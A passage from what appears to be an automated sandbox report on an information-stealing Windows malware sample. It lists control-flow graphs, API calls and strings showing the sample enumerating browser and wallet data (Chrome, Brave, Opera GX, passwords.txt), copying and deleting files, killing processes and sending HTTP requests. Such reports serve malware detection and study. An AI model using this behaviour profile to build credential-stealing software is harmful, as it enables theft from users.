92894->92896 92895 19c54ed5 CreateFileW 92895->92896 92896->92895 92897 19c5506d 92896->92897 92897->92893

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 560 418970-418982 LoadLibraryA 561 418b97-418bf6 LoadLibraryA * 5 560->561 562 418988-418b92 GetProcAddress * 21 560->562 563 418bf8-418c06 GetProcAddress 561->563 564 418c0b-418c12 561->564 562->561 563->564 566 418c14-418c3a GetProcAddress * 2 564->566 567 418c3f-418c46 564->567 566->567 568 418c48-418c56 GetProcAddress 567->568 569 418c5b-418c62 567->569 568->569 570 418c64-418c72 GetProcAddress 569->570 571 418c77-418c7e 569->571 570->571 572 418c80-418ca5 GetProcAddress * 2 571->572 573 418caa 571->573 572->573
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,0144F198), ref: 00418990
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F228), ref: 004189BD
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F240), ref: 004189D6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F450), ref: 004189EE
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F498), ref: 00418A06
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01453258), ref: 00418A1F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,014529C0), ref: 00418A37
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452AA0), ref: 00418A4F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F4B0), ref: 00418A68
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F4C8), ref: 00418A80
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F4E0), ref: 00418A98
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F4F8), ref: 00418AB1
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452BC0), ref: 00418AC9
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F468), ref: 00418AE1
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F510), ref: 00418AFA
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452940), ref: 00418B12
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144F480), ref: 00418B2A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144C750), ref: 00418B43
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452B60), ref: 00418B5B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0144C7B0), ref: 00418B73
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452A40), ref: 00418B8C
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0145DBE8), ref: 00418B9D
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0145DC48), ref: 00418BAF
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0145DA98), ref: 00418BC1
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0145DAE0), ref: 00418BD2
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0145DAF8), ref: 00418BE4
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75B30000,0145DB58), ref: 00418C00
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(751E0000,0145DAB0), ref: 00418C1C
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(751E0000,0145DC78), ref: 00418C34
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,0145DC00), ref: 00418C50
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75670000,014528E0), ref: 00418C6C
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(77310000,014532A8), ref: 00418C88
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00418C9F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                        • String ID: NtQueryInformationProcess$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 2238633743-258108907
                                                                                                                                                                                                                                        • Opcode ID: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
                                                                                                                                                                                                                                        • Instruction ID: 54f81618b0003c9a7d9cd87b1105554b9cb69cd8690f86f09dc99c509db4cf5f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D9134BDA002029FD744DFA4EC6896637FBF78EB413A06519FA05C7360EB349885CB60
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1382 416740-4167c6 call 4198a0 wsprintfA FindFirstFileA memset * 2 1385 4167c8-4167e7 call 40ff00 * 2 1382->1385 1386 4167ec-4167f8 1382->1386 1401 416b65-416b8c call 40ff00 * 2 1385->1401 1388 416800-416814 StrCmpCA 1386->1388 1390 416b23-416b36 FindNextFileA 1388->1390 1391 41681a-41682e StrCmpCA 1388->1391 1390->1388 1392 416b3c-416b61 FindClose call 40ff00 * 2 1390->1392 1391->1390 1394 416834-416865 wsprintfA StrCmpCA 1391->1394 1392->1401 1397 416890-4168ad wsprintfA 1394->1397 1398 416867-41688e wsprintfA 1394->1398 1399 4168b0-4168f0 memset lstrcat strtok_s 1397->1399 1398->1399 1402 4168f2-416903 1399->1402 1403 41691f-41695c memset lstrcat strtok_s 1399->1403 1408 416aba-416ac2 1402->1408 1415 416909-41691d strtok_s 1402->1415 1407 416962-416972 PathMatchSpecA 1403->1407 1403->1408 1411 416a04-416a18 strtok_s 1407->1411 1412 416978-416a02 call 4114d0 wsprintfA call 40ff00 call 411950 call 419a40 1407->1412 1408->1390 1413 416ac4-416ad2 1408->1413 1411->1407 1416 416a1e 1411->1416 1412->1411 1434 416a23-416a34 1412->1434 1413->1392 1418 416ad4-416adc 1413->1418 1415->1402 1415->1403 1416->1408 1418->1390 1421 416ade-416b18 call 401130 call 416740 1418->1421 1428 416b1d 1421->1428 1428->1390 1435 416a3a-416a60 call 40fe80 call 406e40 1434->1435 1436 416b8d-416bac call 4010c0 1434->1436 1443 416a62-416aa8 call 40fe80 call 401130 call 415650 call 40ff00 1435->1443 1444 416aad-416ab3 1435->1444 1443->1444 1444->1408
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0041677A
                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,00416D98,00416EE5), ref: 00416791
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004167A9
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004167BB
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00428648,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041680C
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0042864C,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 00416826
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0041684B
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0042835F,?,?,?,?,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041685D
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00416885
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004168BD
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004168D0
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 004168E6
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 00416913
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0041692C
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0041693C
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 00416952
                                                                                                                                                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041696A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                        • API String ID: 1425701045-3225784412
                                                                                                                                                                                                                                        • Opcode ID: 3b7b0d47180c14f6fa3057f77056ec7edab7d5e3ddc63e7905401cf4b7c79e42
                                                                                                                                                                                                                                        • Instruction ID: 9df80aab3b2c67129cd77f9efb50d4b945a18d7e013ca70540632bd8ef74930f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b7b0d47180c14f6fa3057f77056ec7edab7d5e3ddc63e7905401cf4b7c79e42
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16C1DAB5900209ABCB14DFA4DC85EEE77B8EF49704F50855EF505A3281DB389E88CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1452 40d4f0-40d5b2 call 40fe80 call 40ffb0 call 410040 call 40ff60 call 40ff00 * 2 call 40fe80 * 2 call 410120 FindFirstFileA 1471 40d5b4-40d5f4 call 40ff00 * 5 1452->1471 1472 40d5f9-40d605 1452->1472 1502 40e17d-40e1cb call 40ff00 * 5 1471->1502 1473 40d610-40d624 StrCmpCA 1472->1473 1475 40e120-40e130 FindNextFileA 1473->1475 1476 40d62a-40d63e StrCmpCA 1473->1476 1475->1473 1480 40e136-40e144 FindClose call 40ff00 1475->1480 1476->1475 1478 40d644-40d6d0 call 40ff10 call 40ffb0 call 410040 * 2 call 40ff60 call 40ff00 * 3 1476->1478 1524 40d6d6-40d6ef call 410120 StrCmpCA 1478->1524 1525 40d839-40d8d0 call 410040 * 4 call 40ff60 call 40ff00 * 3 1478->1525 1486 40e149-40e179 call 40ff00 * 4 1480->1486 1486->1502 1531 40d6f5-40d792 call 410040 * 4 call 40ff60 call 40ff00 * 3 1524->1531 1532 40d797-40d834 call 410040 * 4 call 40ff60 call 40ff00 * 3 1524->1532 1575 40d8d6-40d8f8 call 40ff00 call 410120 StrCmpCA 1525->1575 1531->1575 1532->1575 1584 40dad1-40dae7 StrCmpCA 1575->1584 1585 40d8fe-40d912 StrCmpCA 1575->1585 1587 40db58-40db6d StrCmpCA 1584->1587 1588 40dae9-40db48 call 401130 call 40fec0 * 3 call 40d090 1584->1588 1585->1584 1586 40d918-40da49 call 40fe80 call 4114d0 call 410040 call 40ffb0 call 40ff60 call 40ff00 * 3 call 410120 * 2 call 40fe80 call 410040 * 2 call 40ff60 call 40ff00 * 2 call 40fec0 call 406e40 1585->1586 1770 40da9a-40dacc call 410120 call 4100d0 call 410120 call 40ff00 * 2 1586->1770 1771 40da4b-40da95 call 40fec0 call 401130 call 415650 call 40ff00 1586->1771 1590 40dbe7-40dc02 call 40fec0 call 411690 1587->1590 1591 40db6f-40db87 call 410120 StrCmpCA 1587->1591 1645 40db4d-40db53 1588->1645 1615 40dc81-40dc96 StrCmpCA 1590->1615 1616 40dc04-40dc08 1590->1616 1604 40db8d-40db91 1591->1604 1605 40e08f-40e096 1591->1605 1604->1605 1611 40db97-40dbe5 call 401130 call 40fec0 * 2 1604->1611 1609 40e098-40e102 call 40fec0 * 2 call 40fe80 call 401130 call 40d4f0 1605->1609 1610 40e10d-40e11d call 4100d0 * 2 1605->1610 1674 40e107 1609->1674 1610->1475 1657 40dc5f-40dc71 call 40fec0 call 4074e0 1611->1657 1620 40deca-40dedf StrCmpCA 1615->1620 1621 40dc9c-40dd4d call 40fe80 call 410040 call 40ff60 call 40ff00 call 4114d0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410120 * 2 CopyFileA 1615->1621 1616->1605 1624 40dc0e-40dc5c call 401130 call 40fec0 call 40fe80 1616->1624 1620->1605 1628 40dee5-40df96 call 40fe80 call 410040 call 40ff60 call 40ff00 call 4114d0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410120 * 2 CopyFileA 1620->1628 1721 40dd53-40de23 call 401130 call 40fec0 * 3 call 407c80 call 401130 call 40fec0 * 3 call 408810 1621->1721 1722 40de25 1621->1722 1624->1657 1725 40e06c-40e07e call 410120 DeleteFileA call 4100d0 1628->1725 1726 40df9c-40e066 call 401130 call 40fec0 * 3 call 408080 call 401130 call 40fec0 * 3 call 408400 1628->1726 1645->1605 1679 40dc76-40dc7c 1657->1679 1674->1610 1679->1605 1724 40de2b-40de44 call 410120 StrCmpCA 1721->1724 1722->1724 1742 40de46-40dea5 call 401130 call 40fec0 * 3 call 408eb0 1724->1742 1743 40deab-40debd call 410120 DeleteFileA call 4100d0 1724->1743 1750 40e083 1725->1750 1726->1725 1742->1743 1765 40dec2-40dec5 1743->1765 1756 40e086-40e08a call 40ff00 1750->1756 1756->1605 1765->1756 1770->1584 1771->1770
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00427A9B,00427A9A,00000000,?,00427BDC,?,?,00427A97,?,00000000,00000005), ref: 0040D5A4
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                        • String ID: Brave$F$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                                        • API String ID: 2567437900-1653842991
                                                                                                                                                                                                                                        • Opcode ID: 66968d6378468335f2f30316b3ce1fc2dace5581682e8e8ae86198f47f539a7c
                                                                                                                                                                                                                                        • Instruction ID: 52dee1824ab0a65af1c6b66960748f4e36746aede80700b1bdbde72769120ff5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66968d6378468335f2f30316b3ce1fc2dace5581682e8e8ae86198f47f539a7c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32829370900248EADB15EBA5C955BDDBBB86F19304F1040AEF945B32C2DF781B4CCBA6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D1E2
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040D1E9
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,0145F650), ref: 0040D2B0
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2C3
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427A6C), ref: 0040D2D2
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2E5
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427A70), ref: 0040D2F4
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,0145F5C0), ref: 0040D305
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D318
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427A74), ref: 0040D327
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,0145F5B0), ref: 0040D338
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D34B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427A78), ref: 0040D35A
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,014620E8), ref: 0040D36A
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D37D
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427A7C), ref: 0040D38C
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427A80), ref: 0040D39B
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 0040D3D3
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040D428
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D458
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$lstrcpy$HeapProcess$lstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                                                        • String ID: passwords.txt
                                                                                                                                                                                                                                        • API String ID: 4049833551-347816968
                                                                                                                                                                                                                                        • Opcode ID: 6b7e045d715a30179db2ed82f8fee990826387843a50ed3a242fddfd15f67ff1
                                                                                                                                                                                                                                        • Instruction ID: 215b863f2430d563b93ca64cb16b4ae420a8412cb18fc12b55f4b5a4a6015adc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b7e045d715a30179db2ed82f8fee990826387843a50ed3a242fddfd15f67ff1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55D17474900209ABCB04EBE4DC56BEEBB79AF19304F50452EF911B3291DF785A48CBB5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 2466 404490-404582 call 40fec0 call 4043c0 call 40fe80 * 5 call 410120 InternetOpenA StrCmpCA 2483 404584 2466->2483 2484 40458b-40458d 2466->2484 2483->2484 2485 404593-404711 call 4114d0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ffb0 call 40ff60 call 40ff00 * 2 InternetConnectA 2484->2485 2486 404af8-404b87 InternetCloseHandle call 411400 * 2 call 40ff00 * 8 2484->2486 2485->2486 2557 404717-40474f HttpOpenRequestA 2485->2557 2558 404755-404759 2557->2558 2559 404aeb-404af5 InternetCloseHandle 2557->2559 2560 404771-404a83 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 40fe80 call 40ffb0 * 2 call 40ff60 call 40ff00 * 2 call 410120 lstrlen call 410120 * 2 lstrlen call 410120 HttpSendRequestA InternetReadFile 2558->2560 2561 40475b-40476b InternetSetOptionA 2558->2561 2559->2486 2672 404a85-404a8a 2560->2672 2673 404ad9-404ae6 InternetCloseHandle call 40ff00 2560->2673 2561->2560 2672->2673 2674 404a8c-404ad7 call 410040 call 40ff60 call 40ff00 InternetReadFile 2672->2674 2673->2559 2674->2672 2674->2673
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
